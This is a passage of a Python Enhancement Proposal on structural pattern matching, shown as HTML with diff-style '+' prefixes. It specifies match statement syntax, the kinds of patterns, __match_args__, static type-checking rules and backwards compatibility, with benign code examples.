+

This example shows how to find out the “shape” of the data +without doing significant extraction. This code is not very easy to +read, and the intended shape that this is trying to match is not +evident. Compare with the updated code using the proposed syntax:

+
def is_tuple(node: Node) -> bool:
+    match node:
+        case Node(children=[LParen(), RParen()]):
+            return True
+        case Node(children=[Leaf(value="("), Node(), Leaf(value=")")]):
+            return True
+        case _:
+            return False
+
+
+

Note that the proposed code will work without any modifications to the +definition of Node and other classes here. As shown in the +examples above, the proposal supports not just unpacking sequences, but +also doing isinstance checks (like LParen() or str()), +looking into object attributes (Leaf(value="(") for example) and +comparisons with literals.

+

That last feature helps with some kinds of code which look more like +the “switch” statement as present in other languages:

+
match response.status:
+    case 200:
+        do_something(response.data)  # OK
+    case 301 | 302:
+        retry(response.location)  # Redirect
+    case 401:
+        retry(auth=get_credentials())  # Login first
+    case 426:
+        sleep(DELAY)  # Server is swamped, try after a bit
+        retry()
+    case _:
+        raise RequestError("we couldn't get the data")
+
+
+

Although this will work, it’s not necessarily what the proposal is +focused on, and the new syntax has been designed to best support the +destructuring scenarios.

+

See the syntax sections below +for a more detailed specification.

+

We propose that destructuring objects can be customized by a new +special __match_args__ attribute. As part of this PEP we specify +the general API and its implementation for some standard library +classes (including named tuples and dataclasses). See the runtime section below.

+

Finally, we aim to provide comprehensive support for static type +checkers and similar tools. For this purpose, we propose to introduce +a @typing.sealed class decorator that will be a no-op at runtime +but will indicate to static tools that all sub-classes of this class +must be defined in the same module. This will allow effective static +exhaustiveness checks, and together with dataclasses, will provide +basic support for algebraic data types. See the static checkers section for more details.

+
+
+

Syntax and Semantics

+
+

Patterns

+

The pattern is a new syntactic construct that could be considered a loose +generalization of assignment targets. The key properties of a pattern are what +types and shapes of subjects it accepts, what variables it captures and how +it extracts them from the subject. For example, the pattern [a, b] matches +only sequences of exactly 2 elements, extracting the first element into a +and the second one into b.

+

This PEP defines several types of patterns. These are certainly not the +only possible ones, so the design decision was made to choose a subset of +functionality that is useful now but conservative. More patterns can be added +later as this feature gets more widespread use. See the rejected ideas +and deferred ideas sections for more details.

+

The patterns listed here are described in more detail below, but summarized +together in this section for simplicity:

+
    +
  • A literal pattern is useful to filter constant values in a structure. +It looks like a Python literal (including some values like True, +False and None). It only matches objects equal to the literal, and +never binds.
  • +
  • A capture pattern looks like x and is equivalent to an identical +assignment target: it always matches and binds the variable +with the given (simple) name.
  • +
  • The wildcard pattern is a single underscore: _. It always matches, +but does not capture any variable (which prevents interference with other +uses for _ and allows for some optimizations).
  • +
  • A constant value pattern works like the literal but for certain named +constants. Note that it must be a qualified (dotted) name, given the possible +ambiguity with a capture pattern. It looks like Color.RED and +only matches values equal to the corresponding value. It never binds.
  • +
  • A sequence pattern looks like [a, *rest, b] and is similar to +a list unpacking. An important difference is that the elements nested +within it can be any kind of patterns, not just names or sequences. +It matches only sequences of appropriate length, as long as all the sub-patterns +also match. It makes all the bindings of its sub-patterns.
  • +
  • A mapping pattern looks like {"user": u, "emails": [*es]}. It matches +mappings with at least the set of provided keys, and if all the +sub-patterns match their corresponding values. It binds whatever the +sub-patterns bind while matching with the values corresponding to the keys. +Adding **rest at the end of the pattern to capture extra items is allowed.
  • +
  • A class pattern is similar to the above but matches attributes instead +of keys. It looks like datetime.date(year=y, day=d). It matches +instances of the given type, having at least the specified +attributes, as long as the attributes match with the corresponding +sub-patterns. It binds whatever the sub-patterns bind when matching with the +values of +the given attributes. An optional protocol also allows matching positional +arguments.
  • +
  • An OR pattern looks like [*x] | {"elems": [*x]}. It matches if any +of its sub-patterns match. It uses the binding for the leftmost pattern +that matched.
  • +
  • A walrus pattern looks like d := datetime(year=2020, month=m). It +matches only +if its sub-pattern also matches. It binds whatever the sub-pattern match does, and +also binds the named variable to the entire object.
  • +
+
+
+

The match statement

+

A simplified, approximate grammar for the proposed syntax is:

+
...
+compound_statement:
+    | if_stmt
+    ...
+    | match_stmt
+match_stmt: "match" expression ':' NEWLINE INDENT case_block+ DEDENT
+case_block: "case" pattern [guard] ':' block
+guard: 'if' expression
+pattern: walrus_pattern | or_pattern
+walrus_pattern: NAME ':=' or_pattern
+or_pattern: closed_pattern ('|' closed_pattern)*
+closed_pattern:
+    | literal_pattern
+    | capture_pattern
+    | wildcard_pattern
+    | constant_pattern
+    | sequence_pattern
+    | mapping_pattern
+    | class_pattern
+
+
+

See Appendix A for the full, unabridged grammar. +The simplified grammars in this section are there for helping the reader, +not as a full specification.

+

We propose that the match operation should be a statement, not an expression. +Although in +many languages it is an expression, being a statement better suits the general +logic of Python syntax. See rejected ideas for more discussion. +The allowed patterns are described in detail below in the patterns subsection.

+

The match and case keywords are proposed to be soft keywords, +so that they are recognized as keywords at the beginning of a match +statement or case block respectively, but are allowed to be used in +other places as variable or argument names.

+

The proposed indentation structure is as follows:

+
match some_expression:
+    case pattern_1:
+        ...
+    case pattern_2:
+        ...
+
+
+

Here, some_expression represents the value that is being matched against, +which will be referred to hereafter as the subject of the match.

+
+
+

Match semantics

+

The proposed large scale semantics for choosing the match is to choose the first +matching pattern and execute the corresponding suite. The remaining patterns +are not tried. If there are no matching patterns, the statement ‘falls +through’, and execution continues at the following statement.

+

Essentially this is equivalent to a chain of if ... elif ... else +statements. Note that unlike for the previously proposed switch statement, +the pre-computed dispatch dictionary semantics does not apply here.

+

There is no default or else case - instead the special wildcard +_ can be used (see the section on capture_pattern) +as a final ‘catch-all’ pattern.

+

Name bindings made during a successful pattern match outlive the executed suite +and can be used after the match statement. This follows the logic of other +Python statements that can bind names, such as for loop and with +statement. For example:

+
match shape:
+    case Point(x, y):
+        ...
+    case Rectangle(x, y, _, _):
+        ...
+print(x, y)  # This works
+
+
+

During failed pattern matches, some sub-patterns may succeed. For example, +while matching the value [0, 1, 2] with the pattern (0, x, 1), the +sub-pattern x may succeed if the list elements are matched from left to right. +The implementation may choose to either make persistent bindings for those +partial matches or not. User code including a match statement should not rely +on the bindings being made for a failed match, but also shouldn’t assume that +variables are unchanged by a failed match. This part of the behavior is +left intentionally unspecified so different implementations can add +optimizations, and to prevent introducing semantic restrictions that could +limit the extensibility of this feature.

+

Note that some pattern types below define more specific rules about when +the binding is made.

+
+
+

Allowed patterns

+

We introduce the proposed syntax gradually. Here we start from the main +building blocks. The following patterns are supported:

+
+

Literal Patterns

+

Simplified syntax:

+
literal_pattern:
+    | number
+    | string
+    | 'None'
+    | 'True'
+    | 'False'
+
+
+

A literal pattern consists of a simple literal like a string, a number, +a Boolean literal (True or False), or None:

+
match number:
+    case 0:
+        print("Nothing")
+    case 1:
+        print("Just one")
+    case 2:
+        print("A couple")
+    case -1:
+        print("One less than nothing")
+    case 1-1j:
+        print("Good luck with that...")
+
+
+

A literal pattern uses equality with the literal on the right-hand side, so that +in the above example number == 0 and then possibly number == 1, etc. +will be evaluated. Note that although technically negative numbers +are represented using unary minus, they are considered +literals for the purpose of pattern matching. Unary plus is not allowed. +Binary plus and minus are allowed only to join a real number and an imaginary +number to form a complex number, such as 1+1j.

+

Note that because equality (__eq__) is used, and Booleans are equal to +the integers 0 and 1, there is no +practical difference between the following two:

+
case True:
+    ...
+
+case 1:
+    ...
+
+
+

Triple-quoted strings are supported. Raw strings and byte strings +are supported. F-strings are not allowed (since in general they are not +really literals).

+
+
+

Capture Patterns

+

Simplified syntax:

+
capture_pattern: NAME
+
+
+

A capture pattern serves as an assignment target for the matched expression:

+
match greeting:
+    case "":
+        print("Hello!")
+    case name:
+        print(f"Hi {name}!")
+
+
+

Only a single name is allowed (a dotted name is a constant value pattern). +A capture pattern always succeeds. A capture pattern appearing in a scope makes +the name local to that scope. For example, using name after the above +snippet may raise UnboundLocalError rather than NameError, if +the "" case clause was taken:

+
match greeting:
+    case "":
+        print("Hello!")
+    case name:
+        print(f"Hi {name}!")
+if name == "Santa":      # <-- might raise UnboundLocalError
+    ...                  # but works fine if greeting was not empty
+
+
+

While matching against each case clause, a name may be bound at most +once; having two capture patterns with coinciding names is an error:

+
match data:
+    case [x, x]:  # Error!
+        ...
+
+
+

Note: one can still match on a collection with equal items using guards. +Also, [x, y] | Point(x, y) is a legal pattern because the two +alternatives are never matched at the same time.

+
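For example, a guard recovers the ability to match a pair of equal items; a small runnable sketch:

data = [3, 3]

match data:
    case [x, y] if x == y:
        print(f"Got a pair of equal items: {x}")  # prints: Got a pair of equal items: 3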

The single underscore (_) is not considered a NAME and is treated specially +as a wildcard pattern.

+

Reminder: None, False and True are keywords denoting +literals, not names.

+
+
+

Wildcard Pattern

+

Simplified syntax:

+
wildcard_pattern: "_"
+
+
+

The single underscore (_) name is a special kind of pattern that always +matches but never binds:

+
match data:
+    case [_, _]:
+        print("Some pair")
+        print(_)  # Error!
+
+
+

Given that no binding is made, it can be used as many times as desired, unlike +capture patterns.

+
+
+

Constant Value Patterns

+

Simplified syntax:

+
constant_pattern: NAME ('.' NAME)+
+
+
+

This is used to match against constants and enum values. +Every dotted name in a pattern is looked up using normal Python name +resolution rules, and the value is used for comparison by equality with +the match subject (same as for literals):

+
from enum import Enum
+
+class Sides(str, Enum):
+    SPAM = "Spam"
+    EGGS = "eggs"
+    ...
+
+match entree[-1]:
+    case Sides.SPAM:  # Compares entree[-1] == Sides.SPAM.
+        response = "Have you got anything without Spam?"
+    case side:  # Assigns side = entree[-1].
+        response = f"Well, could I have their Spam instead of the {side} then?"
+
+
+

Note that there is no way to use unqualified names as constant value +patterns (they always denote variables to be captured). See +rejected ideas for other syntactic alternatives that were +considered for constant value patterns.

+
+
+

Sequence Patterns

+

Simplified syntax:

+
sequence_pattern:
+    | '[' [values_pattern] ']'
+    | '(' [value_pattern ',' [values_pattern]] ')'
+values_pattern: ','.value_pattern+ ','?
+value_pattern: '*' capture_pattern | pattern
+
+
+

A sequence pattern follows the same semantics as unpacking assignment. +Like unpacking assignment, both tuple-like and list-like syntax can be +used, with identical semantics. Each element can be an arbitrary +pattern; there may also be at most one *name pattern to catch all +remaining items:

+
match collection:
+    case 1, [x, *others]:
+        print("Got 1 and a nested sequence")
+    case (1, x):
+        print(f"Got 1 and {x}")
+
+
+

To match a sequence pattern the subject must be an instance of +collections.abc.Sequence, and it cannot be any kind of string +(str, bytes, bytearray). It cannot be an iterator. For matching +on a specific collection class, see class pattern below.

+
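For instance, strings are never destructured by a sequence pattern, even though str supports the sequence protocol; a small illustrative sketch:

match "ab":
    case [x, y]:
        print("destructured")  # not reached: str is excluded
    case _:
        print("strings are not matched as sequences")  # this branch is taken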

The _ wildcard can be starred to match sequences of varying lengths. For +example:

+
    +
  • [*_] matches a sequence of any length.
  • +
  • (_, _, *_) matches any sequence of length two or more.
  • +
  • ["a", *_, "z"] matches any sequence of length two or more that starts with +"a" and ends with "z".
  • +
+
+
+

Mapping Patterns

+

Simplified syntax:

+
mapping_pattern: '{' [items_pattern] '}'
+items_pattern: ','.key_value_pattern+ ','?
+key_value_pattern:
+    | (literal_pattern | constant_pattern) ':' or_pattern
+    | '**' capture_pattern
+
+
+

Mapping pattern is a generalization of iterable unpacking to mappings. +Its syntax is similar to dictionary display but each key and value are +patterns "{" (pattern ":" pattern)+ "}". A **rest pattern is also +allowed, to extract the remaining items. Only literal and constant value +patterns are allowed in key positions:

+
import constants
+
+match config:
+    case {"route": route}:
+        process_route(route)
+    case {constants.DEFAULT_PORT: sub_config, **rest}:
+        process_config(sub_config, rest)
+
+
+

The subject must be an instance of collections.abc.Mapping. +Extra keys in the subject are ignored even if **rest is not present. +This is different from sequence pattern, where extra items will cause a +match to fail. But mappings are actually different from sequences: they +have natural structural sub-typing behavior, i.e., passing a dictionary +with extra keys somewhere will likely just work.

+
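A small sketch of both behaviors described above:

subject = {"route": "/home", "debug": True}

# Extra keys in the subject are ignored even without **rest:
match subject:
    case {"route": route}:
        print(route)  # prints: /home

# **rest captures whatever items the other keys did not consume:
match subject:
    case {"route": route, **rest}:
        print(rest)   # prints: {'debug': True}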

For this reason, **_ is invalid in mapping patterns; it would always be a +no-op that could be removed without consequence.

+

Matched key-value pairs must already be present in the mapping, and not created +on-the-fly by __missing__ or __getitem__. For example, +collections.defaultdict instances will only match patterns with keys that +were already present when the match block was entered.

+
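For example, a minimal sketch with a defaultdict subject:

from collections import defaultdict

config = defaultdict(lambda: "/default")

match config:
    case {"route": route}:
        print(route)           # not reached: "route" is absent, and matching
                               # does not trigger the default factory
    case _:
        print("no route set")  # this branch is taken

print(config["route"])  # ordinary item access still creates it: /default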
+
+

Class Patterns

+

Simplified syntax:

+
class_pattern:
+    | name_or_attr '(' ')'
+    | name_or_attr '(' ','.pattern+ ','? ')'
+    | name_or_attr '(' ','.keyword_pattern+ ','? ')'
+    | name_or_attr '(' ','.pattern+ ',' ','.keyword_pattern+ ','? ')'
+keyword_pattern: NAME '=' or_pattern
+
+
+

A class pattern provides support for destructuring arbitrary objects. +There are two possible ways of matching on object attributes: by position +like Point(1, 2), and by name like Point(x=1, y=2). These +two can be combined, but a positional match cannot follow a match by name. +Each item in a class pattern can be an arbitrary pattern. A simple +example:

+
match shape:
+    case Point(x, y):
+        ...
+    case Rectangle(x0, y0, x1, y1, painted=True):
+        ...
+
+
+

Whether a match succeeds or not is determined by the equivalent of an +isinstance call. If the subject (shape, in the example) is not +an instance of the named class (Point or Rectangle), the match +fails. Otherwise, it continues (see details in the runtime section).

+

The named class must inherit from type. It may be a single name +or a dotted name (e.g. some_mod.SomeClass or mod.pkg.Class). +The leading name must not be _, so e.g. _(...) and +_.C(...) are invalid. Use object(foo=_) to check whether the +matched object has an attribute foo.

+

By default, sub-patterns may only be matched by keyword for +user-defined classes. In order to support positional sub-patterns, a +custom __match_args__ attribute is required. +The runtime allows matching against +arbitrarily nested patterns by chaining all of the instance checks and +attribute lookups appropriately.

+
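For example, a user-defined class might opt into positional sub-patterns like this (a minimal sketch):

class Point:
    __match_args__ = ("x", "y")  # enables positional patterns like Point(a, b)

    def __init__(self, x, y):
        self.x = x
        self.y = y

match Point(1, 2):
    case Point(x, 0):
        print("on the x-axis")
    case Point(x, y):
        print(x, y)  # prints: 1 2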
+
+
+

Combining multiple patterns (OR patterns)

+

Multiple alternative patterns can be combined into one using |. This means +the whole pattern matches if at least one alternative matches. +Alternatives are tried from left to right and have a short-circuit property: +subsequent patterns are not tried if one matches. Examples:

+
match something:
+    case 0 | 1 | 2:
+        print("Small number")
+    case [] | [_]:
+        print("A short sequence")
+    case str() | bytes():
+        print("Something string-like")
+    case _:
+        print("Something else")
+
+
+

The alternatives may bind variables, as long as each alternative binds +the same set of variables (excluding _). For example:

+
match something:
+    case 1 | x:  # Error!
+        ...
+    case x | 1:  # Error!
+        ...
+    case one := [1] | two := [2]:  # Error!
+        ...
+    case Foo(arg=x) | Bar(arg=x):  # Valid, both arms bind 'x'
+        ...
+    case [x] | x:  # Valid, both arms bind 'x'
+        ...
+
+
+
+
+

Guards

+

Each top-level pattern can be followed by a guard of the form +if expression. A case clause succeeds if the pattern matches and the guard +evaluates to a true value. For example:

+
match input:
+    case [x, y] if x > MAX_INT and y > MAX_INT:
+        print("Got a pair of large numbers")
+    case x if x > MAX_INT:
+        print("Got a large number")
+    case [x, y] if x == y:
+        print("Got equal items")
+    case _:
+        print("Not an outstanding input")
+
+
+

If evaluating a guard raises an exception, it is propagated onwards rather +than failing the case clause. Names that appear in a pattern are bound before the +guard is evaluated. So this will work:

+
values = [0]
+
+match values:
+    case [x] if x:
+        ...  # This is not executed
+    case _:
+        ...
+print(x)  # This will print "0"
+
+
+

Note that guards are not allowed for nested patterns, so that [x if x > 0] +is a SyntaxError and 1 | 2 if 3 | 4 will be parsed as +(1 | 2) if (3 | 4).

+
+
+

Walrus patterns

+

It is often useful to match a sub-pattern and bind the corresponding +value to a name. For example, it can be useful to write more efficient +matches, or simply to avoid repetition. To simplify such cases, any pattern +(other than the walrus pattern itself) can be preceded by a name and +the walrus operator (:=). For example:

+
match get_shape():
+    case Line(start := Point(x, y), end) if start == end:
+        print(f"Zero length line at {x}, {y}")
+
+
+

The name on the left of the walrus operator can be used in a guard, in +the match suite, or after the match statement. However, the name will +only be bound if the sub-pattern succeeds. Another example:

+
match group_shapes():
+    case [], [point := Point(x, y), *other]:
+        print(f"Got {point} in the second group")
+        process_coordinates(x, y)
+        ...
+
+
+

Technically, most such examples can be rewritten using guards and/or nested +match statements, but this will be less readable and/or will produce less +efficient code. Essentially, most of the arguments in PEP 572 apply here +equally.

+

The wildcard _ is not a valid name here.

+
+
+
+

Runtime specification

+
+

The Match Protocol

+

The equivalent of an isinstance call is used to decide whether an +object matches a given class pattern and to extract the corresponding +attributes. Classes requiring different matching semantics (such as +duck-typing) can do so by defining __instancecheck__ (a +pre-existing metaclass hook) or by using typing.Protocol.

+

The procedure is as follows (a rough code sketch is given after this list):

+
    +
  • The class object for Class in Class(<sub-patterns>) is +looked up and isinstance(obj, Class) is called, where obj is +the value being matched. If false, the match fails.
  • +
  • Otherwise, if any sub-patterns are given in the form of positional +or keyword arguments, these are matched from left to right, as +follows. The match fails as soon as a sub-pattern fails; if all +sub-patterns succeed, the overall class pattern match succeeds.
  • +
  • If there are match-by-position items and the class has a +__match_args__ attribute, the item at position i +is matched against the value looked up by attribute +__match_args__[i]. For example, a pattern Point2d(5, 8), +where Point2d.__match_args__ == ["x", "y"], is translated +(approximately) into obj.x == 5 and obj.y == 8.
  • +
  • If there are more positional items than the length of +__match_args__, a TypeError is raised.
  • +
  • If the __match_args__ attribute is absent on the matched class, +and one or more positional items appear in a match, +TypeError is also raised. We don’t fall back on +using __slots__ or __annotations__ – “In the face of ambiguity, +refuse the temptation to guess.”
  • +
  • If there are any match-by-keyword items the keywords are looked up +as attributes on the subject. If the lookup succeeds the value is +matched against the corresponding sub-pattern. If the lookup fails, +the match fails.
  • +
+
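A rough, non-normative Python sketch of this procedure for a class pattern with positional and keyword sub-patterns might look like the following; match_subpattern is a hypothetical stand-in for the full recursive matching logic:

def match_subpattern(value, pattern):
    # Stand-in for the full recursive pattern-matching logic.
    return value == pattern

def match_class_pattern(subject, cls, positional, keyword):
    if not isinstance(subject, cls):
        return False
    kw = dict(keyword)
    if positional:
        match_args = getattr(cls, "__match_args__", None)
        if match_args is None:
            raise TypeError("class does not support match-by-position")
        if len(positional) > len(match_args):
            raise TypeError("too many positional sub-patterns")
        # Positional item i is matched against the attribute named
        # by __match_args__[i].
        for i, pattern in enumerate(positional):
            kw[match_args[i]] = pattern
    for name, pattern in kw.items():
        try:
            value = getattr(subject, name)
        except AttributeError:
            return False  # a failed attribute lookup fails the match
        if not match_subpattern(value, pattern):
            return False
    return True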

Such a protocol favors simplicity of implementation over flexibility and +performance. For other considered alternatives, see extended matching.

+

For the most commonly-matched built-in types (bool, +bytearray, bytes, dict, float, +frozenset, int, list, set, str, and tuple), a +single positional sub-pattern is allowed to be passed to +the call. Rather than being matched against any particular attribute +on the subject, it is instead matched against the subject itself. This +creates behavior that is useful and intuitive for these objects:

+
    +
  • bool(False) matches False (but not 0).
  • +
  • tuple((0, 1, 2)) matches (0, 1, 2) (but not [0, 1, 2]).
  • +
  • int(i) matches any int and binds it to the name i.
  • +
+
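A small runnable sketch of this self-matching behavior; note that the bool case is placed before the int case because bool is a subclass of int:

def describe(obj):
    match obj:
        case bool(b):   # checked first: bool is an int subclass
            return f"bool: {b}"
        case int(i):    # matches any other int and binds it to i
            return f"int: {i}"
        case str(s):
            return f"str: {s!r}"
        case _:
            return "something else"

print(describe(True))  # bool: True
print(describe(3))     # int: 3
print(describe("hi"))  # str: 'hi'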
+
+

Overlapping sub-patterns

+

Certain classes of overlapping matches are detected at +runtime and will raise exceptions. In addition to basic checks +described in the previous subsection:

+
    +
  • The interpreter will check that two match items are not targeting the same +attribute, for example Point2d(1, 2, y=3) is an error.
  • +
  • It will also check that a mapping pattern does not attempt to match +the same key more than once.
  • +
+
+
+

Special attribute __match_args__

+

The __match_args__ attribute is always looked up on the type +object named in the pattern. If present, it must be a list or tuple +of strings naming the allowed positional arguments.

+

In deciding what names should be available for matching, the +recommended practice is that class patterns should be the mirror of +construction; that is, the set of available names and their types +should resemble the arguments to __init__().

+

Only match-by-name will work by default, and classes should define +__match_args__ as a class attribute if they would like to support +match-by-position. Additionally, dataclasses and named tuples will +support match-by-position out of the box. See below for more details.

+
+
+

Exceptions and side effects

+

While matching each case, the match statement may trigger execution of other +functions (for example __getitem__(), __len__() or +a property). Almost every exception caused by those propagates outside of the +match statement normally. The only case where an exception is not propagated is +an AttributeError raised while trying to look up an attribute while matching +attributes of a Class Pattern; that case results in just a matching failure, +and the rest of the statement proceeds normally.

+

The only side effect carried out explicitly by the matching process is the binding of +names. However, the process relies on attribute access, +instance checks, len(), equality and item access on the subject and some of +its components. It also evaluates constant value patterns and the left side of +class patterns. While none of those typically create any side-effects, some of +these objects could. This proposal intentionally leaves out any specification +of what methods are called or how many times. User code relying on that +behavior should be considered buggy.

+
+
+

The standard library

+

To facilitate the use of pattern matching, several changes will be made to +the standard library:

+
    +
  • Namedtuples and dataclasses will have auto-generated __match_args__.
  • +
  • For dataclasses the order of attributes in the generated __match_args__ +will be the same as the order of corresponding arguments in the generated +__init__() method. This includes the situations where attributes are +inherited from a superclass.
  • +
+

In addition, a systematic effort will be put into going through +existing standard library classes and adding __match_args__ where +it looks beneficial.

+
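For example, with the auto-generated __match_args__, dataclass instances can be matched positionally without any extra boilerplate (a small sketch):

from dataclasses import dataclass

@dataclass
class Color:
    red: int
    green: int
    blue: int

# __match_args__ is generated as ("red", "green", "blue"), following
# the argument order of the generated __init__():
match Color(0, 255, 0):
    case Color(_, 255, _):
        print("full green channel")  # this branch is taken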
+
+
+

Static checkers specification

+
+

Exhaustiveness checks

+

From a reliability perspective, experience shows that missing a case when +dealing with a set of possible data values leads to hard-to-debug issues, +thus forcing people to add safety asserts like this:

+
def get_first(data: Union[int, list[int]]) -> int:
+    if isinstance(data, list) and data:
+        return data[0]
+    elif isinstance(data, int):
+        return data
+    else:
+        assert False, "should never get here"
+
+
+

PEP 484 specifies that static type checkers should support exhaustiveness in +conditional checks with respect to enum values. PEP 586 later generalized this +requirement to literal types.

+

This PEP further generalizes this requirement to +arbitrary patterns. A typical situation where this applies is matching an +expression with a union type:

+
def classify(val: Union[int, Tuple[int, int], List[int]]) -> str:
+    match val:
+        case [x, y] if x > 0 and y > 0:
+            return f"A pair of {x} and {y}"
+        case [x, *other]:
+            return f"A sequence starting with {x}"
+        case int():
+            return "Some integer"
+        # Type-checking error: some cases unhandled.
+
+
+

The exhaustiveness checks should also apply where both pattern matching +and enum values are combined:

+
from enum import Enum
+from typing import Union
+
+class Level(Enum):
+    BASIC = 1
+    ADVANCED = 2
+    PRO = 3
+
+class User:
+    name: str
+    level: Level
+
+class Admin:
+    name: str
+
+account: Union[User, Admin]
+
+match account:
+    case Admin(name=name) | User(name=name, level=Level.PRO):
+        ...
+    case User(level=Level.ADVANCED):
+        ...
+    # Type-checking error: basic user unhandled
+
+
+

Obviously, no Matchable protocol (in terms of PEP 544) is needed, since +every class is matchable and therefore is subject to the checks specified +above.

+
+
+

Sealed classes as algebraic data types

+

Quite often it is desirable to apply exhaustiveness to a set of classes without +defining ad-hoc union types, which is itself fragile if a class is missing in +the union definition. A design pattern where a group of record-like classes is +combined into a union is popular in other languages that support pattern +matching and is known under the name of algebraic data types.

+

We propose to add a special class decorator @sealed to the typing +module, which will have no effect at runtime, but will indicate to static +type checkers that all subclasses (direct and indirect) of this class should +be defined in the same module as the base class.

+

The idea is that since all subclasses are known, the type checker can treat +the sealed base class as a union of all its subclasses. Together with +dataclasses this allows a clean and safe support of algebraic data types +in Python. Consider this example:

+
from dataclasses import dataclass
+from typing import sealed
+
+@sealed
+class Node:
+    ...
+
+class Expression(Node):
+    ...
+
+class Statement(Node):
+    ...
+
+@dataclass
+class Name(Expression):
+    name: str
+
+@dataclass
+class Operation(Expression):
+    left: Expression
+    op: str
+    right: Expression
+
+@dataclass
+class Assignment(Statement):
+    target: str
+    value: Expression
+
+@dataclass
+class Print(Statement):
+    value: Expression
+
+
+

With such a definition, a type checker can safely treat Node as +Union[Name, Operation, Assignment, Print], and also safely treat e.g. +Expression as Union[Name, Operation]. So this will result in a type +checking error in the below snippet, because Name is not handled (and the +type checker can give a useful error message):

+
def dump(node: Node) -> str:
+    match node:
+        case Assignment(target, value):
+            return f"{target} = {dump(value)}"
+        case Print(value):
+            return f"print({dump(value)})"
+        case Operation(left, op, right):
+            return f"({dump(left)} {op} {dump(right)})"
+
+
+
+
+

Type erasure

+

Class patterns are subject to runtime type erasure. Namely, although one +can define a type alias IntQueue = Queue[int] so that a pattern like +IntQueue() is syntactically valid, type checkers should reject such a +match:

+
queue: Union[Queue[int], Queue[str]]
+match queue:
+    case IntQueue():  # Type-checking error here
+        ...
+
+
+

Note that the above snippet actually fails at runtime with the current +implementation of generic classes in the typing module, as well as +with builtin generic classes in the recently accepted PEP 585, because +they prohibit isinstance checks.

+

To clarify, generic classes are not prohibited in general from participating +in pattern matching, just that their type parameters can’t be explicitly +specified. It is still fine if sub-patterns or literals bind the type +variables. For example:

+
from typing import Generic, TypeVar, Union
+
+T = TypeVar('T')
+
+class Result(Generic[T]):
+    first: T
+    other: list[T]
+
+result: Union[Result[int], Result[str]]
+
+match result:
+    case Result(first=int()):
+        ...  # Type of result is Result[int] here
+    case Result(other=["foo", "bar", *rest]):
+        ...  # Type of result is Result[str] here
+
+
+
+
+

Note about constants

+

The fact that a capture pattern is always an assignment target may create unwanted +consequences when a user by mistake tries to “match” a value against +a constant instead of using the constant value pattern. As a result, at +runtime such a match will always succeed and moreover override the value of +the constant. It is important therefore that static type checkers warn about +such situations. For example:

+
from typing import Final
+
+MAX_INT: Final = 2 ** 64
+
+value = 0
+
+match value:
+    case MAX_INT:  # Type-checking error here: cannot assign to final name
+        print("Got big number")
+    case _:
+        print("Something else")
+
+
+

Note that the CPython reference implementation also generates a +SyntaxWarning message for this case.

+
+
+

Precise type checking of star matches

+

Type checkers should perform precise type checking of star items in pattern +matching giving them either a heterogeneous list[T] type, or +a TypedDict type as specified by PEP 589. For example:

+
stuff: Tuple[int, str, str, float]
+
+match stuff:
+    case a, *b, 0.5:
+        # Here a is int and b is list[str]
+        ...
+
+
+
+
+
+

Performance Considerations

+

Ideally, a match statement should have good runtime performance compared +to an equivalent chain of if-statements. Although the history of programming +languages is rife with examples of new features which increased engineer +productivity at the expense of additional CPU cycles, it would be +unfortunate if the benefits of match were counter-balanced by a significant +overall decrease in runtime performance.

+

Although this PEP does not specify any particular implementation strategy, +a few words about the prototype implementation and how it attempts to +maximize performance are in order.

+

Basically, the prototype implementation transforms all of the match +statement syntax into equivalent if/else blocks - or more accurately, into +Python byte codes that have the same effect. In other words, all of the +logic for testing instance types, sequence lengths, mapping keys and +so on are inlined in place of the match.

+

This is not the only possible strategy, nor is it necessarily the best. +For example, the instance checks could be memoized, especially +if there are multiple instances of the same class type but with different +arguments in a single match statement. It is also theoretically +possible for a future implementation to process case clauses or sub-patterns in +parallel using a decision tree rather than testing them one by one.

+
+
+

Backwards Compatibility

+

This PEP is fully backwards compatible: the match and case +keywords are proposed to be (and stay!) soft keywords, so their use as +variable, function, class, module or attribute names is not impeded at +all.

+

This is important because match is the name of a popular and +well-known function and method in the re module, which we have no +desire to break or deprecate.

+

The difference between hard and soft keywords is that hard keywords +are always reserved words, even in positions where they make no +sense (e.g. x = class + 1), while soft keywords only get a special +meaning in context. Since PEP 617, the parser backtracks, which means that on +different attempts to parse a code fragment it could interpret a soft +keyword differently.

+

For example, suppose the parser encounters the following input:

+
match [x, y]:
+
+
+

The parser first attempts to parse this as an expression statement. +It interprets match as a NAME token, and then considers [x, +y] to be a double subscript. It then encounters the colon and has +to backtrack, since an expression statement cannot be followed by a +colon. The parser then backtracks to the start of the line and finds +that match is a soft keyword allowed in this position. It then +considers [x, y] to be a list expression. The colon then is just +what the parser expected, and the parse succeeds.

+
+
+

Impacts on third-party tools

+

There are a lot of tools in the Python ecosystem that operate on Python +source code: linters, syntax highlighters, auto-formatters, and IDEs. These +will all need to be updated to include awareness of the match statement.

+

In general, these tools fall into one of two categories:

+

Shallow parsers don’t try to understand the full syntax of Python, but +instead scan the source code for specific known patterns. IDEs, such as Visual +Studio Code, Emacs and TextMate, tend to fall in this category, since frequently +the source code is invalid while being edited, and a strict approach to parsing +would fail.

+

For these kinds of tools, adding knowledge of a new keyword is relatively +easy, just an addition to a table, or perhaps modification of a regular +expression.

+

Deep parsers understand the complete syntax of Python. An example of this +is the auto-formatter Black. A particular requirement with these kinds of +tools is that they not only need to understand the syntax of the current version +of Python, but older versions of Python as well.

+

The match statement uses a soft keyword, and it is one of the first major +Python features to take advantage of the capabilities of the new PEG parser. This +means that third-party parsers which are not ‘PEG-compatible’ will have a hard +time with the new syntax.

+

It has been noted that a number of these third-party tools leverage common parsing +libraries (Black for example uses a fork of the lib2to3 parser). It may be helpful +to identify widely used parsing libraries (such as parso and libCST) +and upgrade them to be PEG compatible.

+

However, since this work would need to be done not only for the match statement, +but for any new Python syntax that leverages the capabilities of the PEG parser, +it is considered out of scope for this PEP. (Although it is suggested that this +would make a fine Summer of Code project.)

+
+
+

Reference Implementation

+

A feature-complete CPython implementation is available on +GitHub.

+

An interactive playground +based on the above implementation was created using Binder and Jupyter.

+
+
+

Example Code

+

A small collection of example code is +available on GitHub.

+
+
+

Rejected Ideas

+

This general idea has been floating around for a pretty long time, and many +back and forth decisions were made. Here we summarize many alternative +paths that were taken but eventually abandoned.

+
+

Don’t do this, pattern matching is hard to learn

+

In our opinion, the proposed pattern matching is not more difficult than +adding isinstance() and getattr() to iterable unpacking. Also, we +believe the proposed syntax significantly improves readability for a wide +range of code patterns, by allowing one to express what one wants to do, rather +than how to do it. We hope the few real code snippets we included in the PEP +above illustrate this comparison well enough. For more real code examples +and their translations see Ref. [1].

+
